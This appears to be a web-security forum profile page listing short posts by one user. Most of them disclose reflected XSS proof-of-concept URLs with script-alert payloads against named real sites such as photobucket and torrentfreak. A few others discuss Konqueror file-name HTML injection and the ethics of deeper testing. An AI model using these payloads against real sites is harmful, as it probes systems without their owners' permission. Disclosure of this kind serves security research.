Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
The ha.ckers.org and sla.ckers.org web application security lab house rules and a place for you to introduce yourself if you like. 

Current Page: 1 of 1
Results 1 - 9 of 9
7 years ago
tr1pp33
I don't know what real use this is but I discovered that there is limited html injection under Konqueror (file manager/internet browser in KDE for Linux). If you name a file as html code i.e. filename is like <html><body> ... </body></html> then you can alter the contents of the status bar which shows the file information. Currently , I've only manged to get it to sho
Forum: OMG Ponies
7 years ago
tr1pp33
Weather Underground, I think there's loads here http://www.wunderground.com/wximage/viewsingleimage.html?mode=singleimage&handle=<script>alert("XSS")</script>&number=0
Forum: Full Disclosure
7 years ago
tr1pp33
I was messing around on alexa.com and found this 'bug' http://www.alexa.com/data/details/traffic_details?url=%00.com the above caused an error saying "Service is unavailable", but if i put in a non-existent website as the url parameter http://www.alexa.com/data/details/traffic_details?url=thissisnotarealwebsite.com I get a no data message. I'm not exactly sure what is happeni
Forum: XSS Info
7 years ago
tr1pp33
yet another image host http://www.picoodle.com/search.php?q="<script>alert(123)</script> tr1pp33 - I need a cool sig, help? ;)
Forum: Full Disclosure
7 years ago
tr1pp33
Another one on torrent site. 3 times on one page, whats the most reflected attacks on one page that someones ever seen? http://torrentfreak.com/?s=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E tr1pp33 - Need a Sig
Forum: Full Disclosure
7 years ago
tr1pp33
My first disclosure :) http://photobucket.com/images/%22%3E%3CBODY%20ONLOAD=alert(123)%3E/
Forum: Full Disclosure
7 years ago
tr1pp33
Well Jib, I suppose that ethically, if you don't have an agreement with the site's owner, you are already crossing the ethical boundary, The more interesting issue like RSnake suggested was how to prove innocence or intent on the web. You see many reports of people's PC being infected turned into zombies for spamming purposes/ DDoS, It could also be used as a launching platform for hacking.
Forum: OMG Ponies
7 years ago
tr1pp33
I've been thinking that some sites when tested, vulnerabilities come to light. However,how deep should we test? Example: Site has weakness which allows reading of arbitrary files on the remote server is it ethical to see how far we can break the system i.e. read remote file which contains SQL passwords .htpasswd files or should we just realise that Yes, we can read any file which that remote
Forum: OMG Ponies
7 years ago
tr1pp33
This is a very good forum, very informative and up to date. Hopefully, I'll be able to contribute something useful in future. Still doing a lot of research into the field at the moment i.e. still a lurking newbie :)
Forum: Intro
Current Page: 1 of 1